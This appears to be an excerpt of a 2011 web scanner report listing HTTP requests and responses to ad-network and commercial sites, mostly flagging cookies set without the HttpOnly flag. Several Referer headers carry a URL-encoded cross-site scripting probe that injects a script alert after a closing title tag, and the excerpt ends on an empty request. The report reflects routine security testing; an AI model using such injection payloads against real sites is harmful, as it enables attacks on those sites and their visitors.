HTTP/1.1 200 OK Connection: close Date: Thu, 03 Feb 2011 20:34:56 GMT Server: Microsoft-IIS/6.0 PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "administrator@waspbarcode.com" on "2007.06.04T10:29-0500" exp "2011.06.04T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "administrator@waspbarcode.com" on "2007.06.04T10:29-0500" exp "2011.06.04T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "administrator@waspbarcode.com" on "2007.06.04T10:29-0500" exp "2011.06.04T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "administrator@waspbarcode.com" on "2007.06.04T10:29-0500" exp "2011.06.04T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "administrator@waspbarcode.com" on "2007.06.04T10:29-0500" exp "2011.06.04T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "administrator@waspbarcode.com" on "2007.06.04T10:29-0500" exp "2011.06.04T12:00-0500" r (l 0 s 0 v 0 o 0)) X-Powered-By: ASP.NET Content-Length: 60930 Content-Type: text/html Set-Cookie: Pop=Set=True; expires=Fri, 04-Feb-2011 20:34:56 GMT; path=/ Set-Cookie: WASP=firsttime=true&source=&originalid=411392716&sessionid=411392716; expires=Fri, 03-Feb-2012 20:34:56 GMT; path=/ Set-Cookie: ASPSESSIONIDCQBSCDRC=MMKFFIIBGDMFFEBNGPKMKPJL; path=/ Cache-control: private
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"> <html xmlns="http://www.w3.org/1999/xhtml">
<head> <title>Barcode Scanners - Laser & Wireless by Wasp Barcode Technologies</ ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /shareware/spow.asp HTTP/1.1 Host: www.wugnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Thu, 03 Feb 2011 20:36:24 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 27 Content-Type: text/html Set-Cookie: ASPSESSIONIDSQQSBTTD=KPNKCKPAPFNMPLDOKMGFDEND; path=/ Cache-control: private
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /media/redir.php?prof=88&camp=4679&affcode=cr197235&cid=7085856551|166328|SmartDraw&mType=e&networkType=search&url[]=http%3A%2F%2Finfo.mindjet.com%2FMindManagerB.html%3Fcmpg%3DAmericas_-_Google_US_Competitors/x22 HTTP/1.1 Host: 102.xg4ken.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Date: Thu, 03 Feb 2011 20:31:19 GMT Server: Apache/2.0.52 (Red Hat) X-Powered-By: PHP/4.3.9 Set-Cookie: kenshoo_id=6de8bdeb-6bd9-2909-a31c-000018710444; expires=Wed, 04-May-2011 20:31:19 GMT; path=/; domain=.xg4ken.com Location: http://info.mindjet.com/MindManagerB.html?cmpg=Americas_-_Google_US_Competitors/x22 P3P: policyref="http://www.xg4ken.com/w3c/p3p.xml", CP="ADMa DEVa OUR IND DSP NON LAW" Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8
The following cookies were issued by the application and do not have the HttpOnly flag set:
_uid="a104_5562153497824379009";expires=Fri, 03 Feb 2012 21:07:44 GMT;domain=.fwmrm.net;path=/;
_auv="g12288~1.1296767264.0,12720.1296767264.0,^";expires=Sat, 05 Mar 2011 21:07:44 GMT;domain=.fwmrm.net;path=/;
_cvr="1296767264^11894^sg12288~sg11948^0~0^0.000000~5.000000,";expires=Sat, 05 Mar 2011 21:07:44 GMT;domain=.fwmrm.net;path=/;
_vr="1296767252.0+7564699552021921.248599~249349~331220~,";expires=Sat, 05 Mar 2011 21:07:44 GMT;domain=.fwmrm.net;path=/;
_sc="sg12288.1296767252.1296767264.28800.0.5,";expires=Sat, 05 Mar 2011 21:07:44 GMT;domain=.fwmrm.net;path=/;
_wr="g12288";expires=Sat, 05 Mar 2011 21:07:44 GMT;domain=.fwmrm.net;path=/;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
_uid="a104_5562153497824379009";expires=Fri, 03 Feb 2012 21:07:32 GMT;domain=.fwmrm.net;path=/;
_vr="1296767252.0+7564699552021921.248599~249349~331220~,";expires=Sat, 05 Mar 2011 21:07:32 GMT;domain=.fwmrm.net;path=/;
_sc="sg12288.1296767252.1296767252.28800.0.0,";expires=Sat, 05 Mar 2011 21:07:32 GMT;domain=.fwmrm.net;path=/;
_wr="g12288";expires=Sat, 05 Mar 2011 21:07:32 GMT;domain=.fwmrm.net;path=/;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /-/spec/opensearch/1.1/ HTTP/1.1 Host: a9.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 20:31:21 GMT Server: Server Content-Type: text/html; charset=utf-8 Content-Length: 2727 Set-Cookie: a9locale=en_US; Domain=.a9.com; Path=/ Set-Cookie: a9Temp="{\"w\":\"m\"}"; Version=1; Domain=.a9.com; Path=/ Vary: Accept-Encoding,User-Agent Connection: close
<html> <head>
<script language="javascript" type="text/javascript"> <!-- var a9IsIE7 = true; var a9IsIE = true; var a9IsMoz = false; var a9IsSafari = false; var a9IsOpera = false;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /Sports/wireStory HTTP/1.1 Host: abcnews.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 20:31:26 GMT Content-Type: text/html Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: abc05 X-Powered-By: ASP.NET Set-Cookie: SWID=B93EDC68-F596-4509-B1FC-2C48F519C999; path=/; expires=Thu, 03-Feb-2031 20:31:23 GMT; domain=.go.com; Content-Length: 7679 Connection: close X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en">
The following cookie was issued by the application and does not have the HttpOnly flag set:
test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Fri, 04 Feb 2011 02:44:40 GMT
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ad/N3671.msnmidfunnel.com/B5159652.21;sz=1x1;pc=%5BTPAS_ID%5D;ord=2013940297? HTTP/1.1 Accept: */* Referer: http://www.msn.com/ Accept-Language: en-US User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Host: ad.doubleclick.net Proxy-Connection: Keep-Alive
Response
HTTP/1.1 302 Moved Temporarily Content-Length: 0 Date: Fri, 04 Feb 2011 02:29:40 GMT Location: http://s0.2mdn.net/viewad/998766/49-1x1.gif Cache-Control: no-cache Pragma: no-cache Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Fri, 04 Feb 2011 02:44:40 GMT P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Server: GFE/2.0 Content-Type: text/html
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ad/N6421.152847.MSN.COM/B5094800.20;abr=!ie4;abr=!ie5;sz=1x1;ord=1362100664? HTTP/1.1 Accept: */* Referer: http://www.msn.com/ Accept-Language: en-US User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Host: ad.doubleclick.net Proxy-Connection: Keep-Alive
Response
HTTP/1.1 302 Found P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Date: Fri, 04 Feb 2011 02:29:41 GMT Pragma: no-cache Expires: Fri, 01 Jan 1990 00:00:00 GMT Cache-Control: no-cache, must-revalidate Location: http://s0.2mdn.net/viewad/2850237/1x1.gif Content-Type: image/gif Set-Cookie: test_cookie=CheckForPermission; expires=Fri, 04-Feb-2011 02:44:41 GMT; path=/; domain=.doubleclick.net X-Content-Type-Options: nosniff Server: cafe Content-Length: 0 X-XSS-Protection: 1; mode=block
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /a/bpix?adv=1050&id=5&r= HTTP/1.1 Host: ad.trafficmp.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /a/bpix?adv=1050&id=5&r= HTTP/1.1 Host: ad.trafficmp.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: uid2=4f978e9b0-271c-47b8-9a97-caba692f0bb2-gjq1brxe; T_h9m4=h0l%3A86c%3A1; T_4mpe=h0h%3A86c%3A1; T_3q8t=h0l%3A86c%3A1; T_ax3f=h0h%3A86c%3A1; dly2=3-lg2agz-; dmg2=2-1fbsgynlre.pbz%7CS20752%7CWfbsgynlre+grpuabybtvrf+vap.%7CJ178%7CHHF%7CX769%7CIGK%7CR%40541.244%7CLqnyynf%7CDoebnqonaq%7CQ587.232%7CZfbsgynlre+grpuabybtvrf+vap.%7C-; hst2=3-lg2agz-1~1b4ykgj40t72i~i9b~4fqb~0-1~14288lsu2vxsy~i97~4fq7~q-1~1aao14q745q7r~i9b~4fqb~q-1~15stqp6ba7xf0~i9b~4fqb~13-; rth=2-lg22an-h0h~86c~1~1-h0l~86c~1~1-9tc~0~1~1-
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /a/bpix?adv=1050&id=5&r= HTTP/1.1 Host: ad.trafficmp.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /a/js?plid=23661 HTTP/1.1 Host: ad.trafficmp.com Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net/adi/lb.buzzillions/;net=lb;u=,lb-82680071_1296770408,11d765b6a10b1b3,none,an.51-an.5-ex.32-ex.76-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-cm.sports_h-cm.weath_l-cm.ent_h-bk.rdst1;;kw=reviews%2F59ab9%3C%2Ftitle%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E4e54375ce26%2Fx22;pos=atf;tile=3;sz=300x250;contx=none;dc=w;btg=an.51;btg=an.5;btg=ex.32;btg=ex.76;btg=cm.cm_aa_gn1;btg=cm.sportsreg;btg=cm.sportsfan;btg=cm.de16_1;btg=cm.de18_1;btg=cm.rdst7;btg=cm.rdst8;btg=cm.polit_h;btg=cm.sports_h;btg=cm.weath_l;btg=cm.ent_h;btg=bk.rdst1;ord=1296769784? Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: uid2=4f978e9b0-271c-47b8-9a97-caba692f0bb2-gjq1brxe; T_ahzq=h0l%3A85m%3A1; T_km24=h0h%3A85m%3A1; dly2=3-lg2ag9-; dmg2=2-1fbsgynlre.pbz%7CS20752%7CWfbsgynlre+grpuabybtvrf+vap.%7CJ178%7CHHF%7CX769%7CIGK%7CR%40541.244%7CLqnyynf%7CDoebnqonaq%7CQ587.232%7CZfbsgynlre+grpuabybtvrf+vap.%7C-; hst2=3-lg2ag9-1~1aao14q745q7r~i9b~4fqb~0-1~15stqp6ba7xf0~i9b~4fqb~d-; rth=2-lg22an-h0h~85m~1~1-h0l~85m~1~1-9tc~0~1~1-
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /a/js?plid=23659 HTTP/1.1 Host: ad.trafficmp.com Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net/adi/lb.buzzillions/;net=lb;u=,lb-28103178_1296770408,11d765b6a10b1b3,none,an.51-an.5-ex.32-ex.76-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-cm.sports_h-cm.weath_l-cm.ent_h-bk.rdst1;;kw=reviews%2F59ab9%3C%2Ftitle%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E4e54375ce26%2Fx22;pos=btf;tile=5;sz=160x600;contx=none;dc=w;btg=an.51;btg=an.5;btg=ex.32;btg=ex.76;btg=cm.cm_aa_gn1;btg=cm.sportsreg;btg=cm.sportsfan;btg=cm.de16_1;btg=cm.de18_1;btg=cm.rdst7;btg=cm.rdst8;btg=cm.polit_h;btg=cm.sports_h;btg=cm.weath_l;btg=cm.ent_h;btg=bk.rdst1;ord=1296769784? Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: uid2=4f978e9b0-271c-47b8-9a97-caba692f0bb2-gjq1brxe; T_ahzq=h0l%3A85m%3A1; T_km24=h0h%3A85m%3A1; dly2=3-lg2ag9-; dmg2=2-1fbsgynlre.pbz%7CS20752%7CWfbsgynlre+grpuabybtvrf+vap.%7CJ178%7CHHF%7CX769%7CIGK%7CR%40541.244%7CLqnyynf%7CDoebnqonaq%7CQ587.232%7CZfbsgynlre+grpuabybtvrf+vap.%7C-; hst2=3-lg2ag9-1~1aao14q745q7r~i9b~4fqb~0-1~15stqp6ba7xf0~i9b~4fqb~d-; rth=2-lg22an-h0h~85m~1~1-h0l~85m~1~1-9tc~0~1~1-
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /a/js?plid=23663 HTTP/1.1 Host: ad.trafficmp.com Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net/adi/lb.buzzillions/;net=lb;u=,lb-14847884_1296770433,11d765b6a10b1b3,none,an.51-an.5-ex.32-ex.76-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-cm.sports_h-cm.weath_l-cm.ent_h-bk.rdst1;;kw=reviews%2F59ab9%3C%2Ftitle%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E4e54375ce26%2Fx22;pos=atf;tile=1;dcopt=ist;sz=728x90;contx=none;dc=w;btg=an.51;btg=an.5;btg=ex.32;btg=ex.76;btg=cm.cm_aa_gn1;btg=cm.sportsreg;btg=cm.sportsfan;btg=cm.de16_1;btg=cm.de18_1;btg=cm.rdst7;btg=cm.rdst8;btg=cm.polit_h;btg=cm.sports_h;btg=cm.weath_l;btg=cm.ent_h;btg=bk.rdst1;ord=1296769784? Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: uid2=4f978e9b0-271c-47b8-9a97-caba692f0bb2-gjq1brxe; T_fg2y=h0l%3A85m%3A1; T_73th=h0h%3A85m%3A1; dly2=3-lg2ag9-; dmg2=2-1fbsgynlre.pbz%7CS20752%7CWfbsgynlre+grpuabybtvrf+vap.%7CJ178%7CHHF%7CX769%7CIGK%7CR%40541.244%7CLqnyynf%7CDoebnqonaq%7CQ587.232%7CZfbsgynlre+grpuabybtvrf+vap.%7C-; hst2=3-lg2ag9-1~14288lsu2vxsy~i97~4fq7~0-1~1aao14q745q7r~i9b~4fqb~0-1~15stqp6ba7xf0~i9b~4fqb~d-; rth=2-lg22an-h0h~85m~1~1-h0l~85m~1~1-9tc~0~1~1-
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /a/js?plid=23663 HTTP/1.1 Host: ad.trafficmp.com Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net/adi/lb.buzzillions/;net=lb;u=,lb-5843489_1296770394,11d765b6a10b1b3,none,an.51-an.5-ex.32-ex.76-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-cm.sports_h-cm.weath_l-cm.ent_h-bk.rdst1;;pos=atf;tile=1;dcopt=ist;sz=728x90;contx=none;dc=w;btg=an.51;btg=an.5;btg=ex.32;btg=ex.76;btg=cm.cm_aa_gn1;btg=cm.sportsreg;btg=cm.sportsfan;btg=cm.de16_1;btg=cm.de18_1;btg=cm.rdst7;btg=cm.rdst8;btg=cm.polit_h;btg=cm.sports_h;btg=cm.weath_l;btg=cm.ent_h;btg=bk.rdst1;ord=1296770389? Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: T_4ffd=9tc%3A0%3A1; rth=2-lg22an-9tc~0~1~1-; uid2=4f978e9b0-271c-47b8-9a97-caba692f0bb2-gjq1brxe
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /a/js?plid=23663 HTTP/1.1 Host: ad.trafficmp.com Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net/adi/lb.buzzillions/;net=lb;u=,lb-36820622_1296770406,11d765b6a10b1b3,none,an.51-an.5-ex.32-ex.76-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-cm.sports_h-cm.weath_l-cm.ent_h-bk.rdst1;;kw=reviews%2F59ab9%3C%2Ftitle%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E4e54375ce26%2Fx22;pos=atf;tile=1;dcopt=ist;sz=728x90;contx=none;dc=w;btg=an.51;btg=an.5;btg=ex.32;btg=ex.76;btg=cm.cm_aa_gn1;btg=cm.sportsreg;btg=cm.sportsfan;btg=cm.de16_1;btg=cm.de18_1;btg=cm.rdst7;btg=cm.rdst8;btg=cm.polit_h;btg=cm.sports_h;btg=cm.weath_l;btg=cm.ent_h;btg=bk.rdst1;ord=1296769784? Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: uid2=4f978e9b0-271c-47b8-9a97-caba692f0bb2-gjq1brxe; T_1g6v=h0l%3A859%3A1; T_kjvx=h0h%3A859%3A1; dly2=3-lg2afw-; dmg2=2-1fbsgynlre.pbz%7CS20752%7CWfbsgynlre+grpuabybtvrf+vap.%7CJ178%7CHHF%7CX769%7CIGK%7CR%40541.244%7CLqnyynf%7CDoebnqonaq%7CQ587.232%7CZfbsgynlre+grpuabybtvrf+vap.%7C-; hst2=3-lg2afw-1~15stqp6ba7xf0~i9b~4fqb~0-; rth=2-lg22an-h0h~859~1~1-h0l~859~1~1-9tc~0~1~1-
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /a/js?plid=23659 HTTP/1.1 Host: ad.trafficmp.com Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net/adi/lb.buzzillions/;net=lb;u=,lb-92324644_1296770433,11d765b6a10b1b3,none,an.51-an.5-ex.32-ex.76-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-cm.sports_h-cm.weath_l-cm.ent_h-bk.rdst1;;kw=reviews%2F59ab9%3C%2Ftitle%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E4e54375ce26%2Fx22;pos=btf;tile=5;sz=160x600;contx=none;dc=w;btg=an.51;btg=an.5;btg=ex.32;btg=ex.76;btg=cm.cm_aa_gn1;btg=cm.sportsreg;btg=cm.sportsfan;btg=cm.de16_1;btg=cm.de18_1;btg=cm.rdst7;btg=cm.rdst8;btg=cm.polit_h;btg=cm.sports_h;btg=cm.weath_l;btg=cm.ent_h;btg=bk.rdst1;ord=1296769784? Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: uid2=4f978e9b0-271c-47b8-9a97-caba692f0bb2-gjq1brxe; T_fg2y=h0l%3A85m%3A1; T_73th=h0h%3A85m%3A1; dly2=3-lg2ag9-; dmg2=2-1fbsgynlre.pbz%7CS20752%7CWfbsgynlre+grpuabybtvrf+vap.%7CJ178%7CHHF%7CX769%7CIGK%7CR%40541.244%7CLqnyynf%7CDoebnqonaq%7CQ587.232%7CZfbsgynlre+grpuabybtvrf+vap.%7C-; hst2=3-lg2ag9-1~14288lsu2vxsy~i97~4fq7~0-1~1aao14q745q7r~i9b~4fqb~0-1~15stqp6ba7xf0~i9b~4fqb~d-; rth=2-lg22an-h0h~85m~1~1-h0l~85m~1~1-9tc~0~1~1-
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /a/js?plid=23663 HTTP/1.1 Host: ad.trafficmp.com Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net/adi/lb.buzzillions/;net=lb;u=,lb-5843489_1296770394,11d765b6a10b1b3,none,an.51-an.5-ex.32-ex.76-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-cm.sports_h-cm.weath_l-cm.ent_h-bk.rdst1;;pos=atf;tile=1;dcopt=ist;sz=728x90;contx=none;dc=w;btg=an.51;btg=an.5;btg=ex.32;btg=ex.76;btg=cm.cm_aa_gn1;btg=cm.sportsreg;btg=cm.sportsfan;btg=cm.de16_1;btg=cm.de18_1;btg=cm.rdst7;btg=cm.rdst8;btg=cm.polit_h;btg=cm.sports_h;btg=cm.weath_l;btg=cm.ent_h;btg=bk.rdst1;ord=1296770389? Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: T_4ffd=9tc%3A0%3A1; rth=2-lg22an-9tc~0~1~1-; uid2=4f978e9b0-271c-47b8-9a97-caba692f0bb2-gjq1brxe
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /a/js?plid=23659 HTTP/1.1 Host: ad.trafficmp.com Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net/adi/lb.buzzillions/;net=lb;u=,lb-28103178_1296770408,11d765b6a10b1b3,none,an.51-an.5-ex.32-ex.76-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-cm.sports_h-cm.weath_l-cm.ent_h-bk.rdst1;;kw=reviews%2F59ab9%3C%2Ftitle%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E4e54375ce26%2Fx22;pos=btf;tile=5;sz=160x600;contx=none;dc=w;btg=an.51;btg=an.5;btg=ex.32;btg=ex.76;btg=cm.cm_aa_gn1;btg=cm.sportsreg;btg=cm.sportsfan;btg=cm.de16_1;btg=cm.de18_1;btg=cm.rdst7;btg=cm.rdst8;btg=cm.polit_h;btg=cm.sports_h;btg=cm.weath_l;btg=cm.ent_h;btg=bk.rdst1;ord=1296769784? Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: uid2=4f978e9b0-271c-47b8-9a97-caba692f0bb2-gjq1brxe; T_ahzq=h0l%3A85m%3A1; T_km24=h0h%3A85m%3A1; dly2=3-lg2ag9-; dmg2=2-1fbsgynlre.pbz%7CS20752%7CWfbsgynlre+grpuabybtvrf+vap.%7CJ178%7CHHF%7CX769%7CIGK%7CR%40541.244%7CLqnyynf%7CDoebnqonaq%7CQ587.232%7CZfbsgynlre+grpuabybtvrf+vap.%7C-; hst2=3-lg2ag9-1~1aao14q745q7r~i9b~4fqb~0-1~15stqp6ba7xf0~i9b~4fqb~d-; rth=2-lg22an-h0h~85m~1~1-h0l~85m~1~1-9tc~0~1~1-
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/971.560.tk.100x25/1765474321 HTTP/1.1 Accept: */* Referer: http://www.msn.com/ Accept-Language: en-US User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Host: ad.wsod.com Proxy-Connection: Keep-Alive Cookie: u=4d1e80eb13df2; i_1=33:971:560:0:0:34240:1296573769:B2|33:971:560:0:0:34147:1296491944:B2|33:1359:827:0:0:34115:1296343593:B2
Response
HTTP/1.1 302 Found Server: nginx/0.6.39 Date: Fri, 04 Feb 2011 02:29:41 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 Set-Cookie: u=4d1e80eb13df2; expires=Mon, 07-Mar-2011 02:29:41 GMT; path=/ Set-Cookie: i_1=33:971:560:0:0:38777:1296786581:L|33:971:560:0:0:34240:1296573769:B2|33:971:560:0:0:34147:1296491944:B2; expires=Sun, 06-Mar-2011 02:29:41 GMT; path=/ Location: http://admedia.wsod.com/media/p.gif P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 0
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
